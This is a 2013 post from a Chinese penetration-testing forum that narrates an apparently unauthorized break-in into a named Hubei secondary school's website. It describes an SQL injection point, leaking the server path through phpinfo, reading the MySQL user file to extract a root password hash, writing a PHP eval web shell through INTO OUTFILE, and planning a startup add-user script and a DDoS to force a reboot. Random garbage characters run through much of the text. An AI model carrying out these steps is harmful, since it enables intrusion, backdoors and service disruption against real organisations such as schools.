中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
, g, D/ c; }* D发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
2 S" r4 {( ~4 l* f3 X4 Y; k  v& x# S$ v, S( G
' K) J6 E+ ^: K) Y9 o( m
4 z1 n4 M( Z4 I6 m3 w5 P
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 . ^, t3 b& [8 L2 B

5 f6 ~: ~! T5 I. `7 p, Q$ S4 F那么想可以直接写入shell ,getshell有几个条件:$ ^& `; P5 O: _$ {
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF6 |% |6 }+ D7 X6 `# t

% g) b, e5 ?2 T' B( g  n试着爆绝对路径:) ^3 I8 N# W8 f# K' w
1./phpMyAdmin/index.php?lang[]=1  ( A/ V% w* x8 u# h. M0 _8 v1 s
2./phpMyAdmin/phpinfo.php  
3 M& `: b8 V/ n5 J/ [- ^3./load_file()  5 L7 d: p0 y% D
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  ( E$ w7 Q5 b1 f$ J
5./phpmyadmin/libraries/select_lang.lib.php  
5 I5 n$ P5 O2 G6 t, ?6./phpmyadmin/libraries/lect_lang.lib.php  3 S5 y3 S" g, p8 \5 n; K2 R& R
7./phpmyadmin/libraries/mcrypt.lib.php   3 l* h1 F$ k# V# \: T
8./phpmyadmin/libraries/export/xls.php  
: }; z( |5 h# H
. [* I1 \$ e7 c$ o  k. E/ A4 U  l均不行...........................
+ R3 F) P0 e! C1 t% f# D
" C- U5 n( N; S0 j% {& s2 x" N御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
  u" h# g" ]3 y7 Z0 C; N2 T- [
& f+ B  b' ?5 ~9 Y: H1 k4 j权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin & a% h0 y, |6 G8 K
- K2 G, E" G- g% N$ K" V" ~
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
& ^( `! {4 `5 D( a
' V- \3 M- v. \敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
- p* w' ]# Z* M$ U5 y; C+ m5 c: h' Q8 W$ U
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
9 x" G8 c# Y) D: A4 A" H; G- c4 A; T! {* ^
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 4 C% w; Z+ l7 n% H2 @& b8 a! T) A

1 n! l6 i# I( P& n; M* ?$ \' P0 s自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD & z, M, W1 U- N1 Q4 u

6 e: I( T2 h/ b2 t+ C成功读到root密码:3 {# B. M: Q( \" g- S! K
) t; Q) P/ F/ T5 S$ C+ [5 O
17---- r(0072)# ~; F: G: B7 m! A
18---- o(006f)
# B, Z) c4 [1 k* }19---- o(006f)
; ~; ?5 A% Y9 `- F+ t( o, O20---- t(0074)( w' f" F% o1 r) E1 {
21---- *(002a)1 N2 q0 G: i! j7 H
22---- 8(0038)
2 K+ K5 h3 A0 p9 y23---- 2(0032)
. ?1 U! i  W3 ]& a: h6 _24---- E(0045), f6 X+ D( I. ]9 e) \; q# i
25---- 1(0031)3 b) B' C) A# a( O0 Q1 W- [
26---- C(0043)
2 M+ v) k. a% c! ]$ @7 x' }6 t2 o: ?27---- 5(0035)4 f( D5 D5 J4 J  L
28---- 8(0038)
9 v$ R8 S) o9 v- m/ I+ ?29---- 2(0032)
6 k2 W; N& A0 U- f5 n30---- 8(0038)
; U+ [) k$ a1 k7 \31---- A(0041)
  |7 k3 z5 r1 X  O' G/ T0 H) W2 S32---- 9(0039)/ }: ^/ g( ]+ J$ J6 c% Y; I: U
33---- B(0042)
4 [( P8 Q& r6 }7 D34---- 5(0035)) N8 C+ }2 y3 v' J( z
35---- 4(0034)0 a4 _+ f+ Z* w; @1 f8 x
36---- 8(0038)4 X* T, F2 y3 `, w
37---- 6(0036)
) U4 _; D6 f) J1 {# ?; n) w38---- 4(0034)
0 k2 |. Z( i( S39---- 9(0039)6 Q9 P  r" i+ ^# ~( X) S
40---- 1(0031)1 G- w$ N: H% i4 {9 C
41---- 1(0031)
- I% J+ l) H  T5 u9 D42---- 5(0035)5 U  i$ d% J0 x, F: C
43---- 3(0033)0 Z& b" C) n  X1 d
44---- 5(0035)
" G" q& u! a+ @& b, g# U8 {45---- 9(0039)
, U# E0 E) O+ N9 }* J" u9 |/ J46---- 8(0038)
! y$ ?* }' {* }# C& j47---- F(0046)
& E# o% t( L' T' Z7 }& s48---- F(0046)7 h: q6 O1 D9 J- A; E6 B! P
49---- 4(0034)  g( S, a0 j6 i8 q% ~
50---- F(0046)
& D- v# \, Y  y51---- 0(0030)% _& t: V2 O% R# h% N
52---- 3(0033)6 }) o! N" n6 I9 N& `% u
53---- 2(0032)0 p# V- d5 f. [2 z% e- g8 G  E
54---- A(0041)
7 i0 g1 o' l) s3 ^; T55---- 4(0034)
8 V& {! F$ z/ D1 ~: s, Z* t56---- A(0041)
1 y- o) B3 {+ O57---- B(0042)  Z9 ]2 l1 r  ^) }% ]2 K
58---- *(0044)
. f9 c: I; A7 J! B59---- *(0035)5 X. r" W$ _+ Q
60---- *(0041)
3 b& O5 ?; H% ~9 m4 g, U61---- *0032)! L# l5 v5 r  N& S
9 n2 o/ a1 J0 }0 [( c. }8 R; i
解密后成功登陆phpmyamin5 O8 H8 _8 B; B% q- K- A$ A
                          
$ ~* ^7 l0 J% r" b' g- D; }$ j/ l1 X- {7 B: Y& o# ^7 k
                             [attach]164[/attach]$ p, E( v; Q$ g2 f

% w0 \0 b/ O0 V, x5 n/ x找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'- z$ K1 Z! @. H  S5 V

3 F* c( u) G2 G0 T成功执行,拿下shell,菜刀连接:
2 M' z: o% C1 T* y* D: y) k( c; e4 D
" t2 {% }. a6 h( H$ k服务器不支持asp,aspx,php提权无果...................8 U! A$ u6 Z; A, h# \/ [

" i7 D8 t, G( c2 D- p3 V7 X1 Q但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:0 v3 K) A" `/ ]- N0 z- J6 y
服务器上已经有个隐藏帐号了
) p2 I7 V' e+ I2 R: B! {
别名     administrators
  J* z* ?# F  P! [- E注释     管理员对计算机/域有不受限制的完全访问权
( S7 z2 R& z+ [  _6 I4 ~. L
成员
) B' a# J" P0 y. i; M! ^- ~
-------------------------------------------------------------------------------
* V% z0 Z1 i% o0 Vadmin
1 @; V: ?4 C6 r, hAdministrator
  _& t6 `; g5 t: C. R: a( bslipper$
9 Z! q& o- N) `: k, isqluser
) f8 P: i) E- b命令成功完成。 * d, F* v3 w; H! l9 @) i
) N2 ^$ p2 k& w. W7 v
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。" i/ }$ s. Z0 T! k
* T- [3 {  A8 P
ddos服务器重启,不然就只能坐等服务器重启了...............................4 c  C( D' I( B& P
. K' T/ }) }2 N( }  F4 \0 V+ O
      
& E1 ^) i! c: Y2 L

作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2